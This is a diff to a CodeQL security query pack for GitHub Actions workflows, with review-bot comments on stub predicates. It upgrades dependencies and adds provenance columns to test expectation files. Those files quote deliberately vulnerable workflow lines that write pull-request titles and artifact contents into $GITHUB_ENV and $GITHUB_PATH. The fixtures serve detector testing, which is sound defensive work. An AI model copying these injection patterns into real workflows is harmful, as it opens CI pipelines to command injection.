diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 2d3b9696ef6..2e3c13f164c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -4,8 +4,9 @@ */ private import codeql.dataflow.DataFlow +private import codeql.Locations -module ActionsDataFlow implements InputSig { +module ActionsDataFlow implements InputSig { import DataFlowPrivate as Private import DataFlowPublic import Private diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b6b7cd53927..17b29f57025 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -1,3 +1,4 @@ +private import codeql.util.Unit private import codeql.dataflow.DataFlow private import codeql.actions.Ast private import codeql.actions.Cfg as Cfg @@ -8,6 +9,8 @@ private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.dataflow.FlowSteps private import codeql.actions.dataflow.FlowSources +class DataFlowSecondLevelScope = Unit; + cached newtype TNode = TExprNode(DataFlowExpr e) @@ -78,6 +81,9 @@ class DataFlowCall instanceof Cfg::Node { string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } /** @@ -104,6 +110,9 @@ class DataFlowCallable instanceof Cfg::CfgScope { .indexOf(["/action.yml", "/action.yaml"])) else none() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } newtype TReturnKind = TNormalReturn() 
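Review bot: The QLDoc on the new `totalorder()` member of `DataFlowCall` says it "Gets a best-effort total ordering", but the body is `none()`, so the predicate never has a result; the `DataFlowCallable` hunk that follows adds the same member with the same comment. If this is a deliberate placeholder, presumably to satisfy the updated shared-library signature, the comment should say so, for example `/** Gets a best-effort total ordering. Not implemented: this predicate has no result. */`. Both class bodies start outside their hunks, so whether anything else in the class could supply an ordering is not visible here.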
@@ -158,6 +167,19 @@ newtype TContent = predicate forceHighPrecision(Content c) { c instanceof FieldContent } +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + class ContentApprox = ContentSet; ContentApprox getContentApprox(Content c) { result = c } @@ -287,9 +309,13 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { } /** - * a simple local flow step that should always preserve the call context (same callable) + * This is the local flow predicate that is used as a building block in global + * data flow. */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} /** * Holds if data can flow from `node1` to `node2` through a non-local step @@ -366,11 +392,6 @@ predicate clearsContent(Node n, ContentSet c) { none() } */ predicate expectsContent(Node n, ContentSet c) { none() } -/** - * Holds if the node `n` is unreachable when the call context is `call`. - */ -predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } - /** * Holds if flow is allowed to pass from parameter `p` and back to itself as a * side-effect, resulting in a summary from `p` to itself. @@ -400,3 +421,7 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } 
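Review bot: `NodeRegion` is added without any QLDoc, and as written it is a stub: `contains` is `none()`, `totalOrder()` is the constant 1, and `isUnreachableInCall` never holds. A maintainer reading this later cannot tell whether that is intentional. I would add a class comment such as `/** A region of nodes. Stub: no region contains any node, so no node is treated as unreachable in a call context. */` and a one-line QLDoc on `contains` and `totalOrder`.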
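Review bot: `knownSourceModel` and `knownSinkModel` at the end of DataFlowPrivate.qll are added as undocumented `none()` predicates, although this file imports `codeql.actions.dataflow.ExternalFlow`. If sources or sinks can be defined by external models in this pack, they will not be attributed to a model in results, and nothing here tells the reader that this is a known gap. A QLDoc line on each would be enough, for example `/** Holds if source is defined by the model named model. Not populated yet. */`, and likewise for the sink predicate.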
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 87e8124db91..96568f86db3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -178,7 +178,7 @@ class FieldContent extends Content, TFieldContent { predicate hasLocalFlow(Node n1, Node n2) { n1 = n2 or - simpleLocalFlowStep(n1, n2) or + simpleLocalFlowStep(n1, n2, _) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll index c2d51748f20..2fd062e7660 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -3,9 +3,10 @@ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll */ +private import codeql.Locations private import codeql.dataflow.TaintTracking private import DataFlowImplSpecific -module ActionsTaintTracking implements InputSig { +module ActionsTaintTracking implements InputSig { import TaintTrackingPrivate } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index a7e0d23df2b..b8647339d24 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll 
@@ -14,12 +14,16 @@ private import codeql.actions.Ast */ predicate defaultTaintSanitizer(DataFlow::Node node) { none() } +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } /** * Holds if the additional step from `nodeFrom` to `nodeTo` should be included * in all global taint flow configurations. */ -predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" } /** diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c12..00000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index bf05e80e0a6..48045dbf679 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.33 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 + codeql/util: ^1.0.0 + codeql/yaml: ^1.0.0 + codeql/controlflow: ^1.0.0 + codeql/dataflow: ^1.0.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml 
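Review bot: The old two-argument `defaultAdditionalTaintStep` is kept as three commented-out lines directly above the QLDoc of the new three-argument version in TaintTrackingPrivate.qll. Version control already holds the old form, and a commented-out predicate with the same name as the live one makes it harder to see which signature applies; I would drop those three `//` lines. If a remark is wanted, one line says what is new: `// model is always "": additional taint steps carry no model provenance here`.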
@@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 31e367ac317..0a5bfe433e9 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected 
@@ -1,8 +1,8 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | -| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 6540b191068..87c185fb5e1 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected 
@@ -1,7 +1,7 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | -| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 063a26bd6ef..067edb68bb1 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected 
@@ -1,7 +1,7 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | -| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index a45b9acf416..f2178960774 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,5 +1,5 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | 
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 2cabeaca9fa..c76034f74d4 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,7 +1,7 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | -| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | nodes | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index a6be99e1bd0..8589d82d825 100644 
--- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected 
@@ -1,9 +1,9 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | -| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | -| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | 
jobs.job1.outputs.job-output1 | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index c6091f1fc23..7fab238795c 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | 
github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d3b90de71e3..ea360bc56df 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected 
@@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | 
github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index ffaaf91e550..0dbff955318 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | 